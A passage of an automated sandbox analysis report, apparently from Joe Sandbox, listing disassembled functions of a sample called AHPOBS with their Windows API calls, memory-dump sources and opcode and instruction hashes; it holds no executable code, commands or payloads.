                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                      • String ID:
                                      • API String ID: 2027346449-0
                                      • Opcode ID: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                      • Opcode Fuzzy Hash: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                      Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • GetMenu.USER32 ref: 0047A703
                                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                      • _wcslen.LIBCMT ref: 0047A79E
                                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                      • String ID:
                                      • API String ID: 3257027151-0
                                      • Opcode ID: 593a3109556d9b21452c25584920ed9ff9da066780f75faca70946367d94fd10
                                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                      • Opcode Fuzzy Hash: 593a3109556d9b21452c25584920ed9ff9da066780f75faca70946367d94fd10
                                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                      Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLastselect
                                      • String ID:
                                      • API String ID: 215497628-0
                                      • Opcode ID: 32016d442942c99cb5d1d8051373ec334af97d98cdfb278eec92297a0a11cd61
                                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                      • Opcode Fuzzy Hash: 32016d442942c99cb5d1d8051373ec334af97d98cdfb278eec92297a0a11cd61
                                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                      Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 0044443B
                                      • GetKeyboardState.USER32(?), ref: 00444450
                                      • SetKeyboardState.USER32(?), ref: 004444A4
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                      Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 00444633
                                      • GetKeyboardState.USER32(?), ref: 00444648
                                      • SetKeyboardState.USER32(?), ref: 0044469C
                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                      Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                      • String ID:
                                      • API String ID: 2354583917-0
                                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                      Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                      • __wsplitpath.LIBCMT ref: 00475644
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscat.LIBCMT ref: 00475657
                                      • __wcsicoll.LIBCMT ref: 0047567B
                                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                      • String ID:
                                      • API String ID: 2547909840-0
                                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                      Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                      Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Enable$Show$MessageMoveSend
                                      • String ID:
                                      • API String ID: 896007046-0
                                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                      Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                      • __swprintf.LIBCMT ref: 0045D4E9
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu$\VH
                                      • API String ID: 3164766367-2432546070
                                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                      Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0041F707
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • _free.LIBCMT ref: 0041F71A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free_malloc
                                      • String ID: [B
                                      • API String ID: 1020059152-632041663
                                      • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                      • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                      Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004302E6
                                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                                      • GetClientRect.USER32(?,?), ref: 00430364
                                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                      • GetWindowRect.USER32(?,?), ref: 004303C3
                                      • ScreenToClient.USER32(?,?), ref: 004303EC
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                      • String ID:
                                      • API String ID: 3220332590-0
                                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                      Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                      • String ID:
                                      • API String ID: 1612042205-0
                                      • Opcode ID: 406a88ac02121889f2cd88f524cf302c7b9e45acb5ab804a65c54a6be80a4228
                                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                      • Opcode Fuzzy Hash: 406a88ac02121889f2cd88f524cf302c7b9e45acb5ab804a65c54a6be80a4228
                                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                      Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove_strncmp
                                      • String ID: >$U$\
                                      • API String ID: 2666721431-237099441
                                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                      Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044C570
                                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$InputSend
                                      • String ID:
                                      • API String ID: 2221674350-0
                                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
